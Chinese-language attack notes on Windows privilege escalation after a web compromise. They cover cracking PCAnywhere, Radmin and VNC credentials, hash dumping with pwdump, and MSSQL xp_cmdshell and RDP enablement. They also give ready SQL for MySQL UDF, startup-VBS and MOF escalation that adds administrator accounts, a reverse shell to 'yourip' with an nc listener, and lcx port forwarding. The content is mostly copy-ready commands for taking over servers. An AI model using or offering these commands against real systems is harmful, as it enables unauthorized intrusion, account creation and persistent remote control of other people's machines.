提权下---笔记

远程管理软件提权

         pcanywhere

         访问pcanywhere默认安装目录

         下载用户配置文件

         通过破解用户密码文件

一、Pcanywhere

1、上马------点击pcanywhere------host文件-----找到PCA.adim.CIF下载（下载的是名为admin的用户文件）

2、使用工具pcanywhere 选择下载的文件，爆出密码

3、使用pcanywhere连接

二、radmin提权

     通过端口扫描 扫描4899端口

     上传radmin.asp木马读取radmin的加密密文

     使用工具连接

三、vnc提权

通过读到注册表十进制数转换成十六进制数
破解十六进制数得到密码

vncx4.exe –W 回车

输入转换后的十六进制数

连接vnc

四、常见的溢出提权

     巴西烤肉， pr等

     步骤：

     1、通过信息搜集查看服务器打了哪些补丁

     2、根据未打的补丁漏洞进行利用即可

五、破解hash提权

     上传pwdump.exe远程获取hash值

     拿到lc5彩虹表破解

     即可得到管理员密码

     需要管理员权限方可执行读取hash操作

六、启动项提权

     前提写入的目录需要写入权限

     将批处理文件上传到开机启动项目录等待管理员重启即可

七、数据库提权

     SQLserver数据库提权

     mysql数据库提权

     需要具备数据库管理员权限才可以执行提权操作

1、msSQL提权

1.1

     安装组件

     开启3389

     创建用户

     提升权限

     完成

     sa账号的获取，查看config.asp、conn.asp等文件

1.2、msSQL安装执行命令组件

     安装cmd_shell组件

     exec sp_configure ‘show advanced options’, 1

     go

     reconfigure

     go

     exec sp_configure ‘xp_cmdshell’, 1

     go

     reconfigure

     go

1.3、3389操作语句

开启3389

     exec
     master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--

关闭3389

     exec

     master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--

1.4、删除cmd_shell组件

     exec sp_configure ‘show advancer options’, 1

     go

     reconfigure

     go

     exec sp_configure xp_cmdshell; 0

     go

     reconfigure

     go

2、mysql数据库提权

     udf提权

     启动项提权

     maf提权

     反链端口提权

2.1、udf提权

     获取到对方的mysql数据库下的root账号密码

     1、查看网站源码里面数据库配置文件

     （inc、conn、config.sql、common、data等）

     2、查看数据库安装路径下的user.myd(/data/mysql)

     3、暴力破解mysql密码，破解3306端口入侵

udf提权原理

通过root权限导出udf.dll到系统目录下，可以通过udf.dll调用执行cmd

c:\winnt\udf.dll 2000

c:\windows\udf.dll 2003

现在基本上win的服务器就这两个导出udf.dll

5.1以上版本需要导出到mysql安装目录lib\plugin\

create function cmdshell returns string soname ‘udf.dll’

select cmdshell (‘net user abc abc /add’);

select cmdshell (‘net localgroup administrators abc /add’);

drop function cmdshell; 删除函数

2.2、启动项提权

1、查看我们进入数据库中有什么数据表

     mysql>show tables;
     默认情况下，test中没有任何表的存在

     以下为关键部分

 2、在TEST数据库下创建一个新的表

    mysql>create table a (cmd text);

    此时创建了一个新表，表名为a，表中只存放一个字段名为cmd的text文件

3、在表中插入内容

    mysql>insert into a values (“set wshshell=createobject(“”wscript.shell””)”)
   
  　mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);

   mysql>insert into a values (“b=wshshell.ru (“”cmd.exe /c net localgroup administrators 1 /add”,0)”);

　　注意，双引号和括号以及后面的“0”一定要输入，用这三条命令来建立一个VBS的脚本程序。

　　4、mysql>select * from a;

　　此时表中有三行数据，就是前面的VBS的脚本程序

　　5、输出表为一个VBS的脚本文件

　　mysql>select * from a into outfile “c://document//administrator//[开始]菜单//程序//启动//a.vbs”;

　　6、重启

2.3mof提权

     第一种方法：

     上传mof.php

     输入相关信息，执行命令，提权

     第二种方法：

     上传x.mof

     使用select命令导出到正确位置

     select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’

     允许外部地址使用root用户连接的SQL语句

     grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;

八、反链端口提权

     利用mysql客户端工具连接mysql服务器，然后执行以下操作

     1、执行命令

     mysql.exe –h 172.16.10.11 –uroot –p

     enter password:

     mysql>\.c”\mysql.txt

     mysql>select backshell(“yourip”,2010);

     2、本地监听反弹的端口

     nc.exe –vv –l –p 2010

     成功后，会获得一个system权限的cmdshell

九、内网端口转发

     内网主机输入命令

     lcx.exe –slave 外网ip 外网端口 内网ip 内网端口

     lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389

     外网主机输入命令

     lcx.exe –listen 111 1311

     开启3389

     使用

     批处理文件开3389

     使用sql语句开3389

     使用exe开3389

     使用vb开3389

、